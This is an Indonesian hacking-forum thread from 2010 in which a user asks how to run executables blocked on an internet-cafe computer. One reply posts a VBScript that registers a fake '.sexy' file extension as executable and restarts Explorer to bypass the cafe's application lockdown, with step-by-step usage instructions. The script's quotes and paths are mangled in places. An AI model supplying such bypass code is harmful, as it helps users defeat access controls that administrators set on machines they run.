X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

hel me ,, ekstensi exe di warnet ga bisa jalan ,.

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby DISTRO911 » Wed Jan 27, 2010 11:55 am

kemarin waktu q buka aplikasi ada tulisan gini "You are not permitted to execute the following program "E:\idm.exe" Please contact your administrator if you require access"

gimana nie ?? mohon pencerahan para master . :kaca: :kaca: :maaf: :maaf:
DISTRO911
 
Posts: 2
Joined: Wed Jan 27, 2010 11:41 am

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby steventeen » Wed Jan 27, 2010 5:31 pm

cobain deh pake program securitynya om Poni....kalo nggak saLah masuk di bonus Xcode magazine 12....OK...
Image
User avatar
steventeen
 
Posts: 135
Joined: Sun Jul 27, 2008 3:22 pm
Location: Minahasa Selatan

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby kenthanx » Tue Feb 09, 2010 3:13 pm

const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonate}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If


Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs kemudian jalankan.
Kemudian ubah extensi file .exe yg kmu inginkan jadi .sexy lewat cmd
jalankan file *.sexy dari cmd

good luck :devil
kenthanx
 
Posts: 3
Joined: Fri Dec 14, 2007 9:43 am
Location: klaten

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby Darkzzzz » Wed Feb 17, 2010 6:44 am

Wuih... Mantab...
@TS
Mgkn warnetnya pake Anti-Executable dr Faronics atau prog sejenis ;)
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby kenthanx » Wed Feb 17, 2010 2:42 pm

Cma share apa yang kebetulan kita taw aja...........

khan masih newbie......

:circle:
kenthanx
 
Posts: 3
Joined: Fri Dec 14, 2007 9:43 am
Location: klaten

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby A25414N » Mon Mar 01, 2010 7:55 pm

gimana klo vbs juga di blok??

soalnya ane dah pernah nyoba tp tetep ga bisa jalan

mohon pencerahannya

terimakasih
A25414N
 
Posts: 6
Joined: Thu Dec 04, 2008 1:10 am

Re: hel me ,, ekstensi exe di warnet ga bisa jalan ,.

Postby 4ldh3 » Tue Mar 09, 2010 9:20 pm

klo mau yg gampang...pindahin aja prog yg mw di jalanin ke C:....coz program2 windows semua berada di C....jd ga mgkin klo exe jg ga jalan d C :devil :devil
User avatar
4ldh3
 
Posts: 6
Joined: Wed Sep 03, 2008 3:29 pm
Location: Padank

{ FACEBOOK_COMMENT }


Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: Bing [Bot] and 15 guests